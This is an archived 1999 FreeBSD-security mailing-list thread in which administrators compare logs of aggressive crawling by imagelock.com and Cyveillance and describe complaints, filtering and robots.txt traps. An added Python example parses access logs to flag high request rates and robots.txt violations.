	by hub.freebsd.org (Postfix) with ESMTP id 0FC6E14D4F
	for ; Sun, 23 May 1999 13:40:26 -0700 (PDT)
	(envelope-from ratebor@cityline.ru)
Received: from vedi.pc.icp.ac.ru (vedi.pc.icp.ac.ru [192.168.253.19])
	by pro.icp.ac.ru (8.9.2/8.8.7) with SMTP id AAA33398;
	Mon, 24 May 1999 00:42:13 +0400 (MSD)
	(envelope-from ratebor@cityline.ru)
Date: Mon, 24 May 1999 00:42:11 +0400
From: Dmitriy Bokiy
X-Mailer: The Bat! (v1.32) UNREG / CD5BF9353B3B7091
Reply-To: Dmitriy Bokiy
X-Priority: 3 (Normal)
Message-ID: <1229.990524@cityline.ru>
To: Pete Fritchman
Cc: security@FreeBSD.ORG
Subject: Re[2]: Denial of service attack from "imagelock.com"
In-reply-To: <99052316335200.01507@petef>
References: <99052316335200.01507@petef>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Monday, May 24, 1999, 0:32:32 Pete Fritchman wrote:

> Read their webpage. It's not an off-line browser, it's a place that tracks
> copyrights as someone else on the list said.

Yes, that's what I meant by saying that they said who they are. I think
that was just some employees deliberately misusing their off-line browsers.

--Dmitriy

From owner-freebsd-security Sun May 23 14:24: 8 1999
Delivered-To: freebsd-security@freebsd.org
Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179])
	by hub.freebsd.org (Postfix) with ESMTP id 0B77514DE9
	for ; Sun, 23 May 1999 14:24:05 -0700 (PDT)
	(envelope-from fbsd-security@ursine.com)
Received: from michael (lambda.ursine.com [209.133.45.69])
	by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id OAA26165
	for ; Sun, 23 May 1999 14:24:05 -0700 (PDT)
	(envelope-from fbsd-security@ursine.com)
Message-ID: <199905231424140440.0E81E3D5@quaggy.ursine.com>
In-Reply-To: <4.2.0.37.19990523131810.04669d30@localhost>
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost>
X-Mailer: Calypso Version 3.00.00.13 (2)
Date: Sun, 23 May 1999 14:24:14 -0700
From: "Michael Bryan"
To: freebsd-security@freebsd.org
Subject: Re: Denial of service attack from "imagelock.com"
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 5/23/99 at 1:23 PM Brett Glass wrote:

>I don't know whether or not this would help. But complaining to their
>ISP probably would.

Or to them directly. After I saw this thread, I went and checked our
logs, finding similar full-scale scans of our web servers. I wrote
a letter to 'info@imagelock.com', asking that they cease and desist of
all scans of web servers in our network. Within an hour I had a
response from 'belanger@imagelock.com'. He indicated that he had
added our domain to the "do not scan" list they maintain. So he
was at least responsive, and on a Sunday to boot.

Of course, I then pointed out to him that what I wanted was for our
entire network range to be fully bypassed by their scans, not just
our main domain. We have several hosted domains, and I don't want
to have to keep his list updated every time we add/delete a domain.
I haven't heard back yet, but I would hope that they are capable of
blocking by IP address in addition to domain name.

I think it would behoove anybody who's been hit by them to fire back
with a request that they cease and desist. Then monitor to make sure
they honor that. If they don't, complain to AboveNet, who will almost
certainly let ImageLock know they have to clean up their act.

At the very least, perhaps this will get them to clean up their software
so that it does not hit anybody so intensely.

Some things I noted about their scans in our log files:

1) They -are- requesting a robots.txt file before every scan wave.
Whether or not they utilize this, I cannot tell, as we don't have
a robots.txt file in use at this time.

2) Once they start a wave, it apparently gets farmed out to several
different servers.
It is possible for various files to be requested
multiple times during a wave, from several different servers.

3) They don't always seem to respond to Redirects (HTTP code 301).
We had a number of URLs that point to directories, but don't have
the trailing "/", which results in the 301 error to the client when
they come back for it. On some waves, these appear to have been
added to the queue for grabbing later in the same day, but on other
waves no subsequent lookups were done.

4) It looks like they're coming in for a new full scan once every
one to three days, based on the entries in our logs.

All that being said, I don't think this thread should continue on this
mailing list, since it has nothing to do with FreeBSD. It has been
valuable and informative, though --- perhaps this can be continued on
a different (more appropriate) list if desired?

Michael Bryan
fbsd-security@ursine.com

From owner-freebsd-security Sun May 23 14:30:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179])
	by hub.freebsd.org (Postfix) with ESMTP id 0909014DE9
	for ; Sun, 23 May 1999 14:30:47 -0700 (PDT)
	(envelope-from fbsd-security@ursine.com)
Received: from michael (lambda.ursine.com [209.133.45.69])
	by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id OAA26228
	for ; Sun, 23 May 1999 14:30:48 -0700 (PDT)
	(envelope-from fbsd-security@ursine.com)
Message-ID: <199905231430560660.0E88073E@quaggy.ursine.com>
In-Reply-To: <199905231424140440.0E81E3D5@quaggy.ursine.com>
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> <199905231424140440.0E81E3D5@quaggy.ursine.com>
X-Mailer: Calypso Version 3.00.00.13 (2)
Date: Sun, 23 May 1999 14:30:56 -0700
From: "Michael Bryan"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I previously wrote:

>I wrote
>a letter to 'info@imagelock.com', asking that they cease and desist of
>all scans of web servers in our network. Within an hour I had a
>response from 'belanger@imagelock.com'. He indicated that he had
>added our domain to the "do not scan" list they maintain. So he
>was at least responsive, and on a Sunday to boot.
>
>Of course, I then pointed out to him that what I wanted was for our
>entire network range to be fully bypassed by their scans, not just
>our main domain. We have several hosted domains, and I don't want
>to have to keep his list updated every time we add/delete a domain.
>I haven't heard back yet, but I would hope that they are capable of
>blocking by IP address in addition to domain name.

I got another response, again in fairly short order, indicating that
this is exactly what they have done. He also gave me a phone number to
call if I should ever notice their spider visiting our web sites again
in the future.

So they are responsive to requests to be put on their "don't scan me"
list. That doesn't change the fact that their scanning methods are
on the harsh side, but at least you can get them to stop scanning your
network without adding another firewall rule.
Michael Bryan
fbsd-security@ursine.com

From owner-freebsd-security Sun May 23 15:59: 1 1999
Delivered-To: freebsd-security@freebsd.org
Received: from iglou.com (iglou1.iglou.com [192.107.41.3])
	by hub.freebsd.org (Postfix) with ESMTP id 2F83315178
	for ; Sun, 23 May 1999 15:58:55 -0700 (PDT)
	(envelope-from bertke@iglou.com)
Received: from [204.255.239.37] (helo=gameho)
	by iglou.com with smtp (8.9.1/8.9.1)
	id 10lhCm-000607-00; Sun, 23 May 1999 18:58:52 -0400
Message-ID: <008c01bea56f$1da5a360$5f64a8c0@crackhouse.com>
From: "Bert Kellerman"
To: "Matthew Dillon"
Cc:
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com>
Subject: Re: Denial of service attack from "imagelock.com"
Date: Sun, 23 May 1999 18:53:45 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> If they are actually making TCP connections, then their IP address is
> likely to be valid. This means you should be able to traceroute the
> IP address to see what the last hop network is. You can then complain
> to that network - I'd call up their NOC.

From owner-freebsd-security Sun May 23 16: 5:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from iglou.com (iglou2.iglou.com [192.107.41.8])
	by hub.freebsd.org (Postfix) with ESMTP id B699814DA9
	for ; Sun, 23 May 1999 16:05:30 -0700 (PDT)
	(envelope-from bertke@iglou.com)
Received: from [204.255.239.37] (helo=gameho)
	by iglou.com with smtp (8.9.1/8.9.1)
	id 10lhJ9-0005wG-00; Sun, 23 May 1999 19:05:27 -0400
Message-ID: <009401bea570$09546a80$5f64a8c0@crackhouse.com>
From: "Bert Kellerman"
To: "Matthew Dillon"
Cc:
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com>
Subject: Re: Denial of service attack from "imagelock.com"
Date: Sun, 23 May 1999 19:00:21 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

You need UDP connectivity to perform a successful traceroute from a UNIX
client, not TCP. The port number it uses is invalid (like 33,000 I
*believe*) but of course it doesn't matter as all it does is increment the
TTL and record the router that sends it back an ICMP 'TTL expired in
transit'. Now M$ on the other hand decided to use ICMP echo requests for
traceroute on their OSes and of course a lot of nets block ICMP. So either
way, my point is that an HTTP connection doesn't necessarily mean you can
traceroute to it. I see now you might have been saying that because of an
IP address existing you can traceroute, but just wanted to clarify :)

Thanks
Bert

> If they are actually making TCP connections, then their IP address is
> likely to be valid. This means you should be able to traceroute the
> IP address to see what the last hop network is. You can then complain
> to that network - I'd call up their NOC.
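Several posts in this thread describe what the spider looks like from the server side: hundreds of requests in a few minutes, a robots.txt fetch followed by a crawl into paths the file disallows, and the same file pulled from several hosts during one wave. The script below is an added example, not code from the list or from any company named in it; it checks an NCSA common-format access log for those three patterns so an administrator can find a hit before it saturates the link. Every host, log line and the robots.txt in it are constructed sample data, and the 60-requests-per-minute threshold is an arbitrary assumption for the example.

```python
"""Flag crawler abuse in an NCSA common-format access log (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# host ident authuser [date] "method path protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_ROBOTS = """# constructed robots.txt for the example
User-agent: *
Disallow: /private/
Disallow: /poison/
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def parse_robots_disallows(text):
    """Collect Disallow prefixes from the 'User-agent: *' group only."""
    prefixes, in_star_group = [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            in_star_group = (value == "*")
        elif key == "disallow" and in_star_group and value:
            prefixes.append(value)
    return prefixes


def analyze(lines, robots_txt, max_per_minute=60):
    """Return hosts over the per-minute limit, robots.txt violations and
    files fetched by more than one host. The limit is an arbitrary choice."""
    disallows = parse_robots_disallows(robots_txt)
    per_minute = defaultdict(lambda: defaultdict(int))  # host -> minute -> hits
    fetched_robots = set()
    violations = defaultdict(list)
    hosts_per_path = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # tolerate junk lines instead of aborting the whole run
        host, path = rec["host"], rec["path"]
        per_minute[host][rec["time"].replace(second=0)] += 1
        hosts_per_path[path].add(host)
        if path == "/robots.txt":
            fetched_robots.add(host)
        elif host in fetched_robots and any(path.startswith(p) for p in disallows):
            violations[host].append(path)  # read the rules, then ignored them
    peak = {h: max(m.values()) for h, m in per_minute.items()}
    return {
        "rate": {h: n for h, n in peak.items() if n > max_per_minute},
        "robots_violations": dict(violations),
        "duplicate_fetches": {p: sorted(h) for p, h in hosts_per_path.items() if len(h) > 1},
    }


def constructed_log():
    """Constructed sample: one ordinary visitor and a two-host crawler wave."""
    lines = [
        '198.51.100.4 - - [22/May/1999:11:04:10 -0600] "GET / HTTP/1.0" 200 2345',
        '198.51.100.4 - - [22/May/1999:11:04:12 -0600] "GET /images/logo.gif HTTP/1.0" 200 812',
        '203.0.113.7 - - [22/May/1999:11:05:00 -0600] "GET /robots.txt HTTP/1.0" 200 57',
    ]
    for i in range(70):  # 70 large images inside the same minute
        lines.append('203.0.113.7 - - [22/May/1999:11:05:%02d -0600] '
                     '"GET /images/big%d.jpg HTTP/1.0" 200 90000' % (i % 60, i))
    lines.append('203.0.113.7 - - [22/May/1999:11:06:01 -0600] "GET /poison/a1.html HTTP/1.0" 200 4000')
    lines.append('203.0.113.8 - - [22/May/1999:11:06:05 -0600] "GET /images/big3.jpg HTTP/1.0" 200 90000')
    lines.append('this line is not a log entry')
    return lines


if __name__ == "__main__":
    report = analyze(constructed_log(), SAMPLE_ROBOTS)
    for host, n in report["rate"].items():
        print("%s: %d requests in one minute" % (host, n))
    for host, paths in report["robots_violations"].items():
        print("%s ignored robots.txt: %s" % (host, ", ".join(paths)))
    for path, hosts in report["duplicate_fetches"].items():
        print("%s fetched by %s" % (path, ", ".join(hosts)))
```

On a real server, feed `analyze()` the lines of the access log and your own robots.txt; the robots.txt check only fires for a client that actually fetched the file first, which is the behaviour reported above and the strongest sign that the rules were read and disregarded rather than never consulted.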
From owner-freebsd-security Sun May 23 16:37:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2])
	by hub.freebsd.org (Postfix) with ESMTP id 6F63014DA9
	for ; Sun, 23 May 1999 16:37:26 -0700 (PDT)
	(envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2])
	by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA27940;
	Sun, 23 May 1999 17:37:17 -0600 (MDT)
Message-Id: <4.2.0.37.19990523172757.04698960@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Sun, 23 May 1999 17:36:09 -0600
To: "Michael Bryan" , freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <199905231424140440.0E81E3D5@quaggy.ursine.com>
References: <4.2.0.37.19990523131810.04669d30@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 02:24 PM 5/23/99 -0700, Michael Bryan wrote:
>Or to them directly. After I saw this thread, I went and checked our
>logs, finding similar full-scale scans of our web servers.

No surprise, really. If you use Altavista to search for their name, you'll
find exposed Web server access logs which show that they do it to many,
many servers throughout the Web. All without asking.

> I wrote
>a letter to 'info@imagelock.com', asking that they cease and desist of
>all scans of web servers in our network. Within an hour I had a
>response from 'belanger@imagelock.com'. He indicated that he had
>added our domain to the "do not scan" list they maintain. So he
>was at least responsive, and on a Sunday to boot.

You probably received the same boilerplate letter I did. (Yes, it is a
form letter.) Did it look something like this?

>We have put your domain on our don't visit list. Please call me
>directly at 415 392 3444, should our spider visit your site again.
>
>See WWW.IMAGELOCK.com for information on who we are.
>
>In general we have between 10 seconds and 3 minutes between requests.
>
>If for some reason we had requests grouped closer than 10 seconds, then
>we must have hit some type of glitch.
>
>Our spider emulates a netscape browser 3.0.
>
>Again, please accept our apologies for any problems we may have caused.
>
>Ken

I have so far received two messages from them with pieces of boilerplate
text like the above arranged in different ways.
>Of course, I then pointed out to him that what I wanted was for our
>entire network range to be fully bypassed by their scans, not just
>our main domain.

So did I. Guess what? I received another boilerplate message similar to
the first.

>I think it would behoove anybody who's been hit by them to fire back
>with a request that they cease and desist. Then monitor to make sure
>they honor that. If they don't, complain to AboveNet, who will almost
>certainly let ImageLock know they have to clean up their act.
>
>At the very least, perhaps this will get them to clean up their software
>so that it does not hit anybody so intensely.
>
>Some things I noted about their scans in our log files:
>
>1) They -are- requesting a robots.txt file before every scan wave.
>Whether or not they utilize this, I cannot tell, as we don't have
>a robots.txt file in use at this time.

True, but we don't want to shut out the LEGITIMATE robots. We want to
block the attacks.

>2) Once they start a wave, it apparently gets farmed out to several
>different servers. It is possible for various files to be requested
>multiple times during a wave, from several different servers.

We saw this. Hundreds of requests in a few minutes.

>3) They don't always seem to respond to Redirects (HTTP code 301).
>We had a number of URLs that point to directories, but don't have
>the trailing "/", which results in the 301 error to the client when
>they come back for it. On some waves, these appear to have been
>added to the queue for grabbing later in the same day, but on other
>waves no subsequent lookups were done.

We didn't see them responding to redirects at all.

>4) It looks like they're coming in for a new full scan once every
>one to three days, based on the entries in our logs.
>
>
>All that being said, I don't think this thread should continue on this
>mailing list, since it has nothing to do with FreeBSD.
>It has been
>valuable and informative, though --- perhaps this can be continued on
>a different (more appropriate) list if desired?

I wasn't sure what list would be more appropriate! It *is* a security
issue, because it is in effect a denial of service attack.

--Brett Glass

From owner-freebsd-security Sun May 23 16:37:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2])
	by hub.freebsd.org (Postfix) with ESMTP id 6C8E514DE5
	for ; Sun, 23 May 1999 16:37:30 -0700 (PDT)
	(envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2])
	by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA27944;
	Sun, 23 May 1999 17:37:22 -0600 (MDT)
Message-Id: <4.2.0.37.19990523173630.0469dd60@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Sun, 23 May 1999 17:37:14 -0600
To: "Michael Bryan" , freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <199905231430560660.0E88073E@quaggy.ursine.com>
References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> <199905231424140440.0E81E3D5@quaggy.ursine.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 02:30 PM 5/23/99 -0700, Michael Bryan wrote:
>So they are responsive to requests to be put on their "don't scan me"
>list. That doesn't change the fact that their scanning methods are
>on the harsh side, but at least you can get them to stop scanning your
>network without adding another firewall rule.

You are assuming that they are as good as their word. I am not entirely
sure that I trust them.

--Brett Glass

From owner-freebsd-security Sun May 23 18:11:42 1999
Delivered-To: freebsd-security@freebsd.org
Received: from Rigel.orionsys.com (rigel.orionsys.com [205.148.224.9])
	by hub.freebsd.org (Postfix) with ESMTP id AB62414DA3
	for ; Sun, 23 May 1999 18:11:37 -0700 (PDT)
	(envelope-from root@Rigel.orionsys.com)
Received: from localhost (root@localhost)
	by Rigel.orionsys.com (8.8.8/8.8.8) with ESMTP id SAA15019;
	Sun, 23 May 1999 18:11:29 -0700 (PDT)
	(envelope-from root@Rigel.orionsys.com)
Date: Sun, 23 May 1999 18:11:28 -0700 (PDT)
From: David Babler
To: Michael Bryan
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <199905231424140440.0E81E3D5@quaggy.ursine.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 23 May 1999, Michael Bryan wrote:

> On 5/23/99 at 1:23 PM Brett Glass wrote:
> >I don't know whether or not this would help. But complaining to their
> >ISP probably would.
>
> Or to them directly...
>
> Some things I noted about their scans in our log files:
>
> 1) They -are- requesting a robots.txt file before every scan wave.
> Whether or not they utilize this, I cannot tell, as we don't have
> a robots.txt file in use at this time.

They get it, and ignore it. They're just sucking up all files they see,
since, as I said, I have webpoison installed. Webpoison is intended to
befuddle brain-dead spam address harvesters by generating an infinite
number of "interesting" pseudo-random web pages containing what look like
more links (more webpoison pages) and email addresses (all bogus). The
links on the page are invisible to humans and included in the robots.txt
file, so legitimate robots never should go there. Our imagelock.com
friends spent a LONG time there.

-Dave

From owner-freebsd-security Sun May 23 18:16: 6 1999
Delivered-To: freebsd-security@freebsd.org
Received: from roble.com (roble.com [199.108.85.50])
	by hub.freebsd.org (Postfix) with ESMTP id 7CF6214E3F
	for ; Sun, 23 May 1999 18:15:58 -0700 (PDT)
	(envelope-from sendmail@roble.com)
Received: from roble2.roble.com (roble2.roble.com [199.108.85.52])
	by roble.com (Roble1b) with SMTP id SAA11151;
	Sun, 23 May 1999 18:16:06 -0700 (PDT)
Date: Sun, 23 May 1999 18:15:55 -0700 (PDT)
From: Roger Marquis
To: security@FreeBSD.ORG
Cc: firewall-wizards@nfr.net, Firewalls@lists.gnac.net
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, May 22, 1999 at 06:40:20PM -0700, David Babler wrote:
> > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
> > > This morning, someone at the domain "imagelock.com" apparently launched a
> > > denial of service attack against a Web server I administer. The abuser was
>
> > imagelock.com has been banned from my web servers ever since they
> > initiated a DoS attack against me a few months ago. Basically, they
> > download every accessible file on a website. The company's MO is to
>
> Their web client also gleefully ignores robots.txt as well, and spent 2
> hours here chasing web poisoned pages - apparently quitting only when it
> didn't find any images to fingerprint. So they're now blocked here at the
> firewall too - thanks for the heads-up. Wonder how much they can sell
> their service for when they find they don't have access to poke around?

Great information! Thanks Brett. I checked our httpd logs and immediately
found several thousand hits from this subnet, which is now filtered.

Imagelock could be another name for Cyveillance.com. We saw an identical
pattern 2 months ago from another IP which had/has no reverse DNS. The
domain turned out to be Cyveillance and their ISP was (at the time)
Digex.net who forwarded our complaint and followed up twice. Thank you
Digex!

After 3 complaints to Digex and Cyveillance we finally received this
response from Cyveillance:

> Recently Digex, our internet provider, forwarded your inquiry regarding
> visits to your site from 207.87.178.66.
>
> We provide companies with brand protection services on the internet.
> To
> accomplish this goal we employ search engines / web crawlers to scan the
> internet. We are in no way involved with the creation of unsolicited
> commercial email. Please see our web site at http://www.cyveillance.com
> where you can learn more about our company and what we do.
>
> It appears we crawled your web site as part of our general web search, and
> crawled your mailto directories as part of that search. We hope we didn't
> cause you any inconvenience.
>
> If you have any questions, don't hesitate to contact me.
>
> Paul K. Witting
> Manager of Information Systems
> Cyveillance - Intelligent Internet Surveillance
> PWitting@Cyveillance.com
> (703) 519-4212

However they never did stop scanning our subnets until we filtered their
subnet at 207.87.178. This subnet still has no reverse DNS; however,
`whois` shows Cyveillance is now a customer of imaphost.com and
namesecure.com. "imaphost.com" is already in our IP filter list (all 27
lines of it) for previous HTTP abuses; however, namesecure.com is not.
Call me paranoid but it sure looks like another Cyveillance attempt to
cover their tracks.

--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Sun May 23 18:24:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6])
	by hub.freebsd.org (Postfix) with ESMTP id C549E14E21
	for ; Sun, 23 May 1999 18:24:18 -0700 (PDT)
	(envelope-from kernel@tdnet.com.br)
Received: from tdnet.com.br [200.236.148.211] by guepardo.vicosa.com.br
	with ESMTP (SMTPD32-5.00) id ACADBF0154; Sun, 23 May 1999 22:34:37 -0300
Message-ID: <3740B863.6C20B59E@tdnet.com.br>
Date: Mon, 17 May 1999 21:46:28 -0300
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: user uses xv3.10a (PNG) to halt my system.
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear gentlemen,

Probably this is not the most suitable mailing list to post this message
to, but it's not worth subscribing to fbsd-questions only to get an
answer. (If you hate me for that, ignore me.)

a) My system is 2.2.8-STABLE; where can I get an updated list of patches
for this system?

b) I have installed xv 3.10a (PNG), but my system got frozen by running
this software! So now a user (I don't know which) has been stopping my
system.

c) Is it possible to know which user is doing that?

d) How can a user application halt my system? Isn't fbsd supposed to be
robust enough to handle this?

Thank you for your time and cooperation!

Best regards,
Gustavo Rios

From owner-freebsd-security Sun May 23 18:29:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2])
	by hub.freebsd.org (Postfix) with ESMTP id F315315021
	for ; Sun, 23 May 1999 18:29:27 -0700 (PDT)
	(envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2])
	by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id TAA28684;
	Sun, 23 May 1999 19:29:13 -0600 (MDT)
Message-Id: <4.2.0.37.19990523191423.04639500@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Sun, 23 May 1999 19:17:31 -0600
To: David Babler , Michael Bryan
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <199905231424140440.0E81E3D5@quaggy.ursine.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 06:11 PM 5/23/99 -0700, David Babler wrote:
>They get it, and ignore it. They're just sucking up all files they see,
>since, as I said, I have webpoison installed. Webpoison is intended to
>befuddle brain-dead spam address harvesters by generating an infinite
>number of "interesting" pseudo-random web pages containing what look like
>more links (more webpoison pages) and email addresses (all bogus). The
>links on the page are invisible to humans and included in the robots.txt
>file, so legitimate robots never should go there. Our imagelock.com
>friends spent a LONG time there.

Dave, could you write the people at noc@above.net and abuse@above.net and
tell them that? Ignoring the robots.txt file amounts to unauthorized
access -- big time. That's serious Web abuse.

The Webmasters on this list may want to look over their logs to see if
they've been hit and not known it. grep your logs for imagelock.com; if
you find that they're abusing your server, you may want to firewall them
out and complain to ABOVE.NET.

--Brett Glass

From owner-freebsd-security Sun May 23 18:57:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ontario.mooseriver.com (ontario.mooseriver.com [208.138.31.116])
	by hub.freebsd.org (Postfix) with ESMTP id 6CA4714DB3
	for ; Sun, 23 May 1999 18:57:05 -0700 (PDT)
	(envelope-from jgrosch@ontario.mooseriver.com)
Received: (from jgrosch@localhost)
	by ontario.mooseriver.com (8.9.3/8.9.1) id SAA57666;
	Sun, 23 May 1999 18:56:30 -0700 (PDT)
	(envelope-from jgrosch)
Date: Sun, 23 May 1999 18:56:30 -0700
From: Josef Grosch
To: David Babler
Cc: Michael Bryan, freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Message-ID: <19990523185630.A57604@ontario.mooseriver.com>
Reply-To: jgrosch@MooseRiver.com
References: <199905231424140440.0E81E3D5@quaggy.ursine.com>
X-Mailer: Mutt 0.95.3i

On Sun, May 23, 1999 at 06:11:28PM -0700, David Babler wrote:
>
>
> On Sun, 23 May 1999, Michael Bryan wrote:
> > On 5/23/99 at 1:23 PM Brett Glass wrote:
> > >I don't know whether or not this would help. But complaining to their
> > >ISP probably would.
> >
> > Or to them directly...
> >
> > Some things I noted about their scans in our log files:
> >
> > 1) They -are- requesting a robots.txt file before every scan wave.
> > Whether or not they utilize this, I cannot tell, as we don't have
> > a robots.txt file in use at this time.
>
> They get it, and ignore it. They're just sucking up all files they see,
> since, as I said, I have webpoison installed. Webpoison is intended to
> befuddle brain-dead spam address harvesters by generating an infinite
> number of "interesting" pseudo-random web pages containing what look like
> more links (more webpoison pages) and email addresses (all bogus). The
> links on the page are invisible to humans and included in the robots.txt
> file, so legitimate robots never should go there. Our imagelock.com
> friends spent a LONG time there.

Where can one find webpoison? All the web servers I run, including my little test server on my home machine, have been scanned by imagelock.com.
Josef

--
Josef Grosch           | Another day closer to a | FreeBSD 3.2
jgrosch@MooseRiver.com | Micro$oft free world    | UNIX for the masses

From owner-freebsd-security Sun May 23 19:11: 5 1999
Date: Mon, 24 May 1999 01:16:06 +0200
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Message-ID: <19990524011606.A45814@keltia.freenix.fr>
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> <199905231424140440.0E81E3D5@quaggy.ursine.com> <199905231430560660.0E88073E@quaggy.ursine.com>
In-Reply-To: <199905231430560660.0E88073E@quaggy.ursine.com>; from Michael Bryan on Sun, May 23, 1999 at 02:30:56PM -0700
X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5322 AMD-K6 MMX @ 200 MHz

According to Michael Bryan:
> list. That doesn't change the fact that their scanning methods are
> on the harsh side, but at least you can get them to stop scanning your
> network without adding another firewall rule.

